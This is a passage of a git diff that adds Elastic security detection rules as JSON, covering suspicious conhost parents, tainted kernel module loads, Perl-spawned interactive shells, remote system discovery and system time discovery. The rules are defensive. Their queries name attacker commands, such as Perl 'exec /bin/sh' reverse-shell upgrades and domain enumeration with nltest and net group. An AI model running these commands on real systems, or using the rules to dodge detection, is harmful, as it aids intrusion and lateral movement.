event.type == \"start\" and\n process.name : \"conhost.exe\" and\n process.parent.name : (\"lsass.exe\", \"services.exe\", \"smss.exe\", \"winlogon.exe\", \"explorer.exe\", \"dllhost.exe\", \"rundll32.exe\",\n \"regsvr32.exe\", \"userinit.exe\", \"wininit.exe\", \"spoolsv.exe\", \"ctfmon.exe\") and\n not (process.parent.name : \"rundll32.exe\" and\n process.parent.args : (\"?:\\\\Windows\\\\Installer\\\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc\",\n \"?:\\\\WINDOWS\\\\system32\\\\PcaSvc.dll,PcaPatchSdbTask\",\n \"?:\\\\WINDOWS\\\\system32\\\\davclnt.dll,DavSetCookie\"))\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "05b358de-aa6d-4f6c-89e6-78f74018b43b_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_110.json b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_110.json new file mode 100644 index 00000000000..12833ad8d9c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_110.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Conhost Spawned By Suspicious Parent Process", + "note": "## Triage and analysis\n\n### Investigating Conhost Spawned By Suspicious Parent Process\n\nThe Windows Console Host, or `conhost.exe`, is both the server application for all of the Windows Console APIs as well as the classic Windows user interface for working with command-line applications.\n\nAttackers often rely on custom shell implementations to avoid using built-in command interpreters like `cmd.exe` and `PowerShell.exe` and bypass application allowlisting and security features. Attackers commonly inject these implementations into legitimate system processes.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the parent process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Process from Conhost - 28896382-7d4f-4d50-9b72-67091901fd26\n- Suspicious PowerShell Engine ImageLoad - 852c1f19-68e8-43a6-9dce-340771fe1be3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"conhost.exe\" and\n process.parent.name : (\"lsass.exe\", \"services.exe\", \"smss.exe\", \"winlogon.exe\", \"explorer.exe\", \"dllhost.exe\", \"rundll32.exe\",\n \"regsvr32.exe\", \"userinit.exe\", \"wininit.exe\", \"spoolsv.exe\", \"ctfmon.exe\") and\n not (process.parent.name : \"rundll32.exe\" and\n process.parent.args : (\"?:\\\\Windows\\\\Installer\\\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc\",\n \"?:\\\\WINDOWS\\\\system32\\\\PcaSvc.dll,PcaPatchSdbTask\",\n \"?:\\\\WINDOWS\\\\system32\\\\davclnt.dll,DavSetCookie\"))\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "05b358de-aa6d-4f6c-89e6-78f74018b43b_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_3.json b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_3.json new file mode 100644 index 00000000000..471abafa76b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_3.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors the syslog log file for messages related to instances of a tainted kernel module load. Rootkits often leverage kernel modules as their main defense evasion technique. Detecting tainted kernel module loads is crucial for ensuring system security and integrity, as malicious or unauthorized modules can compromise the kernel and lead to system vulnerabilities or unauthorized access.", + "from": "now-9m", + "index": [ + "logs-system.syslog-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Tainted Kernel Module Load", + "query": "host.os.type:linux and event.dataset:\"system.syslog\" and process.name:kernel and \nmessage:\"module verification failed: signature and/or required key missing - tainting kernel\"\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "05cad2fb-200c-407f-b472-02ea8c9e5e4a", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Filebeat\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat for the Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete Setup and Run Filebeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the Filebeat System Module to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 3 + }, + "id": "05cad2fb-200c-407f-b472-02ea8c9e5e4a_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_4.json b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_4.json new file mode 100644 index 00000000000..ca576edf2af --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_4.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors the syslog log file for messages related to instances of a tainted kernel module load. Rootkits often leverage kernel modules as their main defense evasion technique. Detecting tainted kernel module loads is crucial for ensuring system security and integrity, as malicious or unauthorized modules can compromise the kernel and lead to system vulnerabilities or unauthorized access.", + "from": "now-9m", + "index": [ + "logs-system.syslog-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Tainted Kernel Module Load", + "query": "host.os.type:linux and event.dataset:\"system.syslog\" and process.name:kernel and \nmessage:\"module verification failed: signature and/or required key missing - tainting kernel\"\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "05cad2fb-200c-407f-b472-02ea8c9e5e4a", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Filebeat\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat for the Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete Setup and Run Filebeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the Filebeat System Module to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "05cad2fb-200c-407f-b472-02ea8c9e5e4a_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_108.json b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_108.json new file mode 100644 index 00000000000..f56998c5330 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_108.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a terminal (tty) is spawned via Perl. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Interactive Terminal Spawned via Perl", + "query": "event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:perl and\n process.args:(\"exec \\\"/bin/sh\\\";\" or \"exec \\\"/bin/dash\\\";\" or \"exec \\\"/bin/bash\\\";\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "05e5a668-7b51-4a67-93ab-e9af405c9ef3", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "05e5a668-7b51-4a67-93ab-e9af405c9ef3_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_111.json b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_111.json new file mode 100644 index 00000000000..b090b7e7f61 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_111.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Discovery of remote system information using built-in commands, which may be used to move laterally.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote System Discovery Commands", + "note": "## Triage and analysis\n\n### Investigating Remote System Discovery Commands\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `arp` or `nbstat` utilities to enumerate remote systems in the environment, which is useful for attackers to identify lateral movement targets.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n ((process.name : \"nbtstat.exe\" and process.args : (\"-n\", \"-s\")) or\n (process.name : \"arp.exe\" and process.args : \"-a\") or\n (process.name : \"nltest.exe\" and process.args : (\"/dclist\", \"/dsgetdc\")) or\n (process.name : \"nslookup.exe\" and process.args : \"*_ldap._tcp.dc.*\") or\n (process.name: (\"dsquery.exe\", \"dsget.exe\") and process.args: \"subnet\") or\n ((((process.name : \"net.exe\" or process.pe.original_file_name == \"net.exe\") or\n ((process.name : \"net1.exe\" or process.pe.original_file_name == \"net1.exe\") and not \n process.parent.name : \"net.exe\")) and \n process.args : \"group\" and process.args : \"/domain\" and not process.args : \"/add\")))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1016", + "name": "System Network Configuration Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/" + }, + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "0635c542-1b96-4335-9b47-126582d2c19a_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_6.json b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_6.json new file mode 100644 index 00000000000..b0ae220ede7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_6.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Detects the usage of commonly used system time discovery techniques, which attackers may use during the reconnaissance phase after compromising a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "System Time Discovery", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (process.name: \"net.exe\" or (process.name : \"net1.exe\" and not process.parent.name : \"net.exe\")) and \n process.args : \"time\" and not process.args : \"/set\"\n ) or \n (process.name: \"w32tm.exe\" and process.args: \"/tz\") or \n (process.name: \"tzutil.exe\" and process.args: \"/g\")\n) and not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "06568a02-af29-4f20-929c-f3af281e41aa", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1124", + "name": "System Time Discovery", + "reference": "https://attack.mitre.org/techniques/T1124/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "06568a02-af29-4f20-929c-f3af281e41aa_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0678bc9c-b71a-433b-87e6-2f664b6b3131_3.json b/packages/security_detection_engine/kibana/security_rule/0678bc9c-b71a-433b-87e6-2f664b6b3131_3.json new file mode 100644 index 00000000000..5ccd3ec554e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0678bc9c-b71a-433b-87e6-2f664b6b3131_3.json @@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected an unusually high file size shared by a remote host indicating potential lateral movement activity. One of the primary goals of attackers after gaining access to a network is to locate and exfiltrate valuable information. Instead of multiple small transfers that can raise alarms, attackers might choose to bundle data into a single large file 